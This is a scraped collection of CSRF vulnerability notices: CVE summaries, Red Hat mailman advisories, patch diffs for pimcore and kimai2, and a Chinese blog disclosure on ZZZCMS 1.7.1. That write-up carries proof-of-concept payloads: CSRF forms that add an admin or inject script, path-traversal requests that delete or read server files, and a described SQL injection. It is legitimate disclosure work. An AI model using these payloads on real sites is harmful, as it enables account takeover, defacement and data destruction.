The WP Limits WordPress plugin through 1.0 does not have CSRF check when saving its settings, allowing attacker to make a logged in admin change them, which could make the blog unstable by setting low values

CVE-2021-24818

The Temporary Login Without Password WordPress plugin before 1.7.1 does not have authorisation and CSRF checks when updating its settings, which could allows any logged-in users, such as subscribers to update them

CVE-2021-24836

The WP Admin Logo Changer WordPress plugin through 1.0 does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin update them via a CSRF attack.

CVE-2021-24784

An update for the mailman:2.1 module is now available for Red Hat Enterprise Linux 8.2 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-44227: mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

![Red Hat Customer Portal](https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg)

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat Openshift Container Storage

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus
*   Red Hat CodeReady Studio

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2021-12-13

Updated:

2021-12-13

**RHSA-2021:5080 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: mailman:2.1 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for the mailman:2.1 module is now available for Red Hat Enterprise Linux 8.2 Extended Update Support.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mailman is a program used to help manage e-mail discussion lists.  

Security Fix(es):  

*   mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover (CVE-2021-44227)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.2 x86\_64
*   Red Hat Enterprise Linux Server - AUS 8.2 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.2 s390x
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.2 ppc64le
*   Red Hat Enterprise Linux Server - TUS 8.2 x86\_64
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.2 aarch64
*   Red Hat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 8.2 ppc64le
*   Red Hat Enterprise Linux Server - Update Services for SAP Solutions 8.2 x86\_64

**Fixes**

*   BZ - 2026862 - CVE-2021-44227 mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

x86\_64

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: a31ee9711b4dbf38eade5e24d291de5db658d1b7b2fee5318be96cf18ff931df

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: fb1df1a9cd4625884556fb34e7a2bde043d3242ea5c004bbda786a3d072dd6e4

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: 3f30ad5ffc1b83c2346d0312e37f76ec0028fefa6f4e22fbf7e1907e4cd515f0

**Red Hat Enterprise Linux Server - AUS 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

x86\_64

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: a31ee9711b4dbf38eade5e24d291de5db658d1b7b2fee5318be96cf18ff931df

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: fb1df1a9cd4625884556fb34e7a2bde043d3242ea5c004bbda786a3d072dd6e4

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: 3f30ad5ffc1b83c2346d0312e37f76ec0028fefa6f4e22fbf7e1907e4cd515f0

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

s390x

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.s390x.rpm

SHA-256: 47c4244643700d44edd264ac956f0601822ee455a3bd7a3f958e305a5126b566

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.s390x.rpm

SHA-256: 753b86d74900e052addfb52ed5df8fa714f9f49bb0c6dd83c6c9fc7cf3112e69

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.s390x.rpm

SHA-256: 9afbd0a69ad1e5ac3c2be4da9d1936c77e6d74db603f1fe4352ae2a9416deb9b

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

ppc64le

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: 8099e9d52d49fd6e68c1a793de6eed5f12e8fc022c7f58f24efadfed633448e8

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: 0b964ac6067738ff5d5a00ad39603a373e644ebc7a2decea39edb0d3ffb79960

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: b6df0e26924f037b326740a35260b1f8d1988a7c963758de16b36daf1c5f83fd

**Red Hat Enterprise Linux Server - TUS 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

x86\_64

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: a31ee9711b4dbf38eade5e24d291de5db658d1b7b2fee5318be96cf18ff931df

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: fb1df1a9cd4625884556fb34e7a2bde043d3242ea5c004bbda786a3d072dd6e4

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: 3f30ad5ffc1b83c2346d0312e37f76ec0028fefa6f4e22fbf7e1907e4cd515f0

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

aarch64

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.aarch64.rpm

SHA-256: 581810f7152c42b73c1342a936decd57192c44fbbc1c989f356be307beccea75

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.aarch64.rpm

SHA-256: cc312b0273045cd5bc36ef1207d9386af5eca6705ff9f1abbf0a252b0bbae3bb

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.aarch64.rpm

SHA-256: dd11e04aabdc5ba7fc0b696f63adf98c6454ad5427daee79f5a783c22c1c49c8

**Red Hat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

ppc64le

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: 8099e9d52d49fd6e68c1a793de6eed5f12e8fc022c7f58f24efadfed633448e8

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: 0b964ac6067738ff5d5a00ad39603a373e644ebc7a2decea39edb0d3ffb79960

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.ppc64le.rpm

SHA-256: b6df0e26924f037b326740a35260b1f8d1988a7c963758de16b36daf1c5f83fd

**Red Hat Enterprise Linux Server - Update Services for SAP Solutions 8.2**

SRPM

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.src.rpm

SHA-256: b6b583eb61fd6ba550c8fd21e979195f2bf880b300332909940a490bcb544729

x86\_64

mailman-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: a31ee9711b4dbf38eade5e24d291de5db658d1b7b2fee5318be96cf18ff931df

mailman-debuginfo-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: fb1df1a9cd4625884556fb34e7a2bde043d3242ea5c004bbda786a3d072dd6e4

mailman-debugsource-2.1.29-6.module+el8.2.0+13543+86b2c701.x86\_64.rpm

SHA-256: 3f30ad5ffc1b83c2346d0312e37f76ec0028fefa6f4e22fbf7e1907e4cd515f0

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2021:5080: Red Hat Security Advisory: mailman:2.1 security update

An update for the mailman:2.1 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-44227: mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

![Red Hat Customer Portal](https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg)

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat Openshift Container Storage

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus
*   Red Hat CodeReady Studio

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2021-12-13

Updated:

2021-12-13

**RHSA-2021:5081 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: mailman:2.1 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for the mailman:2.1 module is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mailman is a program used to help manage e-mail discussion lists.  

Security Fix(es):  

*   mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover (CVE-2021-44227)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 8.1 ppc64le
*   Red Hat Enterprise Linux Server - Update Services for SAP Solutions 8.1 x86\_64

**Fixes**

*   BZ - 2026862 - CVE-2021-44227 mailman: CSRF token bypass allows to perform CSRF attacks and admin takeover

**Red Hat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 8.1**

SRPM

mailman-2.1.29-5.module+el8.1.0+13542+e9b93c88.src.rpm

SHA-256: 57492aed91d5bc6ea27067b9db0d8de8f75756c2d46b53f005f17e331599d545

ppc64le

mailman-2.1.29-5.module+el8.1.0+13542+e9b93c88.ppc64le.rpm

SHA-256: f8732fc5633a09c3f103f44886b10faadf5f34658a0074b684163b8d5a2303c4

mailman-debuginfo-2.1.29-5.module+el8.1.0+13542+e9b93c88.ppc64le.rpm

SHA-256: 99856347941a0d13669061851ce32cca3512433b20c8b050ca0ff4fce6401ba7

mailman-debugsource-2.1.29-5.module+el8.1.0+13542+e9b93c88.ppc64le.rpm

SHA-256: 5fc8c9778e235fe1bf92902d85db073f535316719c31b518d25e49d3627c11e0

**Red Hat Enterprise Linux Server - Update Services for SAP Solutions 8.1**

SRPM

mailman-2.1.29-5.module+el8.1.0+13542+e9b93c88.src.rpm

SHA-256: 57492aed91d5bc6ea27067b9db0d8de8f75756c2d46b53f005f17e331599d545

x86\_64

mailman-2.1.29-5.module+el8.1.0+13542+e9b93c88.x86\_64.rpm

SHA-256: f35cc5adba851ce27735d9f9e8635b6d025ccf8865449fd355cf06528a3258a1

mailman-debuginfo-2.1.29-5.module+el8.1.0+13542+e9b93c88.x86\_64.rpm

SHA-256: 743f623e95d50543e634a5e544d8ed02b08073635980a3fd0e671a26b0a98bcb

mailman-debugsource-2.1.29-5.module+el8.1.0+13542+e9b93c88.x86\_64.rpm

SHA-256: 8f20e5c296d4f449124d83a808aad601742543233bb82b8417ba3fc6f176c920

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2021:5081: Red Hat Security Advisory: mailman:2.1 security update

yetiforcecrm is vulnerable to Cross-Site Request Forgery (CSRF)

CVE-2021-4092

pimcore is vulnerable to Cross-Site Request Forgery (CSRF)

@@ -145,9 +145,15 @@

<div id="pimcore\_avatar" style="display:none;"\>

<img src="{{ path('pimcore\_admin\_user\_getimage') }}" data-menu-tooltip\="{{ user.name }} | {{ 'my\_profile'|trans(\[\],'admin') }}"/\>

</div\>

<a id="pimcore\_logout" data-menu-tooltip\="{{ "logout"|trans(\[\],'admin') }}" href="{{ path('pimcore\_admin\_logout') }}" style="display: none"\>

<img src="/bundles/pimcoreadmin/img/material-icons/outline-logout-24px.svg"\>

</a\>

<form id="pimcore\_logout\_form" method="post" action="{{ path('pimcore\_admin\_logout') }}"\>

<input type="hidden" name="csrfToken" value="{{ pimcore\_csrf.getCsrfToken() }}"\>

<a id="pimcore\_logout" data-menu-tooltip\="{{ "logout"|trans(\[\],'admin') }}"

href="#" onclick="document.getElementById('pimcore\_logout\_form').submit();" style="display: none"\>

<img src="/bundles/pimcoreadmin/img/material-icons/outline-logout-24px.svg"\>

</a\>

</form\>

<div id="pimcore\_signet" data-menu-tooltip\="Pimcore Platform ({{ settings.version }}|{{ settings.build }})" style="text-indent: -10000px"\>

BE RESPECTFUL AND HONOR OUR WORK FOR FREE & OPEN SOURCE SOFTWARE BY NOT REMOVING OUR LOGO.

WE OFFER YOU THE POSSIBILITY TO ADDITIONALLY ADD YOUR OWN LOGO IN PIMCORE'S SYSTEM SETTINGS. THANK YOU!

CVE-2021-4082: [Admin] Logout action should use POST method · pimcore/pimcore@3088cec

kimai2 is vulnerable to Cross-Site Request Forgery (CSRF)

@@ -66,7 +66,7 @@ public function \_\_construct(ServiceInvoice $service, InvoiceTemplateRepository $ \* @Route(path="/", name="invoice", methods={"GET", "POST"}) \* @Security("is\_granted('view\_invoice')") \*/ public function indexAction(Request $request, SystemConfiguration $configuration): Response public function indexAction(Request $request, SystemConfiguration $configuration, CsrfTokenManagerInterface $csrfTokenManager): Response { if (!$this\->templateRepository\->hasTemplate()) { if ($this\->isGranted('manage\_invoice\_template')) { @@ -100,6 +100,8 @@ public function indexAction(Request $request, SystemConfiguration $configuration return $this\->redirectToRoute('invoice'); }  
$csrfTokenManager\->refreshToken('invoice.create');  
try { return $this\->renderInvoice($query, $request); } catch (Exception $ex) { @@ -148,6 +150,7 @@ public function previewAction(Customer $customer, Request $request, SystemConfig  
if ($form\->isValid()) { try { $query\->setCustomers(\[$customer\]); $model = $this\->service\->createModel($query);  
return $this\->service\->renderInvoiceWithModel($model, $this\->dispatcher); @@ -167,7 +170,7 @@ public function previewAction(Customer $customer, Request $request, SystemConfig \* @Security("is\_granted('access', customer)") \* @Security("is\_granted('create\_invoice')") \*/ public function createInvoiceAction(Customer $customer, InvoiceTemplate $template, Request $request, SystemConfiguration $configuration): Response public function createInvoiceAction(Customer $customer, InvoiceTemplate $template, Request $request, SystemConfiguration $configuration, CsrfTokenManagerInterface $csrfTokenManager): Response { if (!$this\->templateRepository\->hasTemplate()) { return $this\->redirectToRoute('invoice'); @@ -185,9 +188,13 @@ public function createInvoiceAction(Customer $customer, InvoiceTemplate $templat return $this\->redirectToRoute('invoice'); }  
$csrfTokenManager\->refreshToken('invoice.create');  
$query = $this\->getDefaultQuery(); $form = $this\->getToolbarForm($query, $configuration\->find('invoice.simple\_form')); $form\->submit($request\->query\->all(), false); if ($this\->handleSearch($form, $request)) { return $this\->redirectToRoute('invoice'); }  
if ($form\->isValid()) { $query\->setTemplate($template);

CVE-2021-4033: fix invoice create and search (#2990) · kevinpapst/kimai2@1da26e0

OpUtils in Zoho ManageEngine OpManager 12.5 before 125490 mishandles authentication for a few audit directories.

CVE-2021-44514: Read me | OpManager Help

A Cross Site Request Forgery (CSRF) vulnerability exits in ZZZCMS V1.7.1 via the save_user funciton in save.php.

****漏洞概述****

​ 漏洞存在的位置/adminxxx/save.php第456-508行。注：xxx为任意随机三位数字。

![img](https://zhhhy.github.io/2019/06/28/zzzcms/1.png)

![img](https://zhhhy.github.io/2019/06/28/zzzcms/2.png)

​ 可以看到save\_user()函数接受了管理员的信息参数准备注册。在第479行处，仅对传入的数据是否符合格式和是否重复进行检查。如果满足格式并且不和数据库中的数据重复，就在488行进行插入数据库。当act变量值为user时，会调用save\_user()函数。又由于该文件对是否登录进行了判断。因此，此处为一个CSRF漏洞，只需构造好恶意页面，诱使管理员访问，就可以任意添加一个管理员帐号。

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  

<html\>  
	<form action\='http://127.0.0.1/zzz17/admin261/save.php?act=user' method\="post"\>  
		<input type\='hidden' name\='u\_gid' value\='2'/>  
		<input type\='hidden' name\='username' value\='zhhhy'/>  
		<input type\='hidden' name\='password' value\='6192288a'/>  
		<input type\='hidden' name\='truename' value\='zhhhy'/>  
		<input type\='hidden' name\='mobile' value\='15260131659'/>  
		<input type\='hidden' name\='face' value\='/zzz/plugins/face/face01.png'/>  
		<input type\='submit' value\='点击有惊喜'/>  
	</form\>   
</html\>  

![](https://zhhhy.github.io/2019/06/28/zzzcms/3.png)

当管理员在登录后台以后，点击该按钮就会发送一条POST请求增加一个管理员。

![](https://zhhhy.github.io/2019/06/28/zzzcms/4.png)

![](https://zhhhy.github.io/2019/06/28/zzzcms/6.png)

    可以看到，回显显示了保存成功。我们在后台处可以看到确实增加了一个管理员，并且可以登录成功。

![](https://zhhhy.github.io/2019/06/28/zzzcms/5.png)

**ZZZCMS V1.7.1 存储型XSS漏洞****漏洞概述**

​ 漏洞存在的位置/adminxxx/save.php第806-824行。 注：xxx为随机三位数字。

![](https://zhhhy.github.io/2019/06/28/zzzcms/7.png)

​ 可以看到，在代码的第808行，进行了路径的判断，是否为后台目录文件。在代码的第811行，由白名单限制了只能修改指定文件夹里的文件。

![](https://zhhhy.github.io/2019/06/28/zzzcms/8.png)

​ 观察目录可以发现，template目录底下有许多的JS文件修改。如果我们修改其中被引用的JS文件，那么就可以造成一个存储型的XSS攻击。  
​ 由于在zzz\_file.php文件中的create\_file()函数中，对可修改文件的后缀做了限制。因此，无法利用PHP执行任意代码。

![](https://zhhhy.github.io/2019/06/28/zzzcms/9.png)

**POC**

1  
2  
3  
4  
5  
6  

<html\>  
	<form action\='http://127.0.0.1/zzz17/admin261/save.php?act=editfile' method\="post"\>  
		<input type\='hidden' name\='file' value\='/zzz17/template/pc/cn2016/js/img.js'/>  
		<input type\='hidden' name\='filetext' value\='alert(“zhhhy”);'/>  
		<input type\='submit' value\='点击有惊喜'/>  
	</form\> </html\>  

![](https://zhhhy.github.io/2019/06/28/zzzcms/10.png)

​ 当管理员在登录后台以后，点击该按钮就会发送一条POST请求修改/zzz17/template/pc/cn2016/js/img.js文件

![](https://zhhhy.github.io/2019/06/28/zzzcms/11.png)

![](https://zhhhy.github.io/2019/06/28/zzzcms/12.png)

    可以看到，回显显示了保存成功。我们观察一下/zzz17/template/pc/cn2016/js/img.js 文件。可以发现代码成功被注入进去了。我们只要找到引用了这个文件的页面即可触发XSS。

![](https://zhhhy.github.io/2019/06/28/zzzcms/13.png)

​ 可以看到此处引用了/zzz17/template/pc/cn2016/js/img.js 文件。

![](https://zhhhy.github.io/2019/06/28/zzzcms/14.png)

​ 第一次打开页面加载JS文件时会触发弹窗，效果如下：

![](https://zhhhy.github.io/2019/06/28/zzzcms/15.png)

**ZZZCMS V1.7.1后台任意文件删除漏洞****漏洞概述**

​ 漏洞存在的位置/adminxxx/save.php第825-831行。 注：xxx为随机三位数字。

![](https://zhhhy.github.io/2019/06/28/zzzcms/17.png)

​ 可以看到在第828处定义了一个白名单，只允许这些文件夹里的文件被修改。但是由于未对跳转符号../进行过滤，导致可以进行目录穿越。而831行处调用的del\_file()函数限制了我们不能删除php等文件。但是我们可以通过目录穿越的方式，删除掉其他系统文件，例如Apache的配置文件httpd.conf。 并且由于该函数未进行CSRF的保护，因此还可以通过CSRF来完成这个攻击。

![](https://zhhhy.github.io/2019/06/28/zzzcms/18.png)

**POC**

​ 先看看我们Apache的配置文件的路径为：D:\\phpstudy\\PHPTutorial\\Apache\\conf

![19](https://zhhhy.github.io/2019/06/28/zzzcms/19.png)

判断好路径以后，进行路径穿越构造如下数据包：

1  
2  

POST http://127.0.0.1/zzz17/admin/save.php?act=delfile  
path=/zzz17/upload/adimg/../../../../Apache/conf/httpd.conf  

![](https://zhhhy.github.io/2019/06/28/zzzcms/20.png)

​ 发送数据包之后，再看文件，发现httpd.conf被删除了。此时重启Apache是无法启动的。

![21](https://zhhhy.github.io/2019/06/28/zzzcms/21.png)

**ZZZCMS V1.7.1后台SQL注入漏洞****漏洞概述**

​ 漏洞存在的位置/adminxxx/save.php第344-378行。 注：xxx为随机三位数字。

![](https://zhhhy.github.io/2019/06/28/zzzcms/22.png)

​ 可以看到在第371行处调用了dp\_update()函数。第二个参数采用字符串拼接的方式传入，而且由于传入的变量$tid未做强制类型转换，并且在SQL语句中未使用单引号进行包裹，因此是一处数字型注入。

**POC**

前提条件：获得管理员帐号登录后台。并且tag管理中至少需要一条数据。

![](https://zhhhy.github.io/2019/06/28/zzzcms/23.png)

使用hackbar构造好post请求

![](https://zhhhy.github.io/2019/06/28/zzzcms/24.png)

​ 发送请求，可以看到显示保存成功了。 由于 or 1=1是一定成立的，所以即便tid=-1不存在也能修改成功。

![25](https://zhhhy.github.io/2019/06/28/zzzcms/25.png)

​ 再次访问tag管理页面，可以发现数据被修改了。

![26](https://zhhhy.github.io/2019/06/28/zzzcms/26.png)

**ZZZCMS V1.7.1后台任意文件读取漏洞****漏洞概述**

​ 在后台可以查看缓存文件的内容，由于未对../以及后缀名的限制，导致可以读取任意PHP文件。

![1561713153538](https://zhhhy.github.io/2019/06/28/zzzcms/27)

可以在下图看到config.php的内容被读取出来了。

![](https://zhhhy.github.io/2019/06/28/zzzcms/28.png)

**POC**

1  

GET http://127.0.0.1/zzz17/admin/?module=templateedit&type=/zzz17/runtime/cache/admin/../../../config/zzz\_config.php  

Author: zhhhy

Permalink: http://yoursite.com/2019/06/28/zzzcms/

License: Copyright (c) 2019 CC-BY-NC-4.0 LICENSE

Solgan: Do you believe in **DESTINY**?****

Tag

#csrf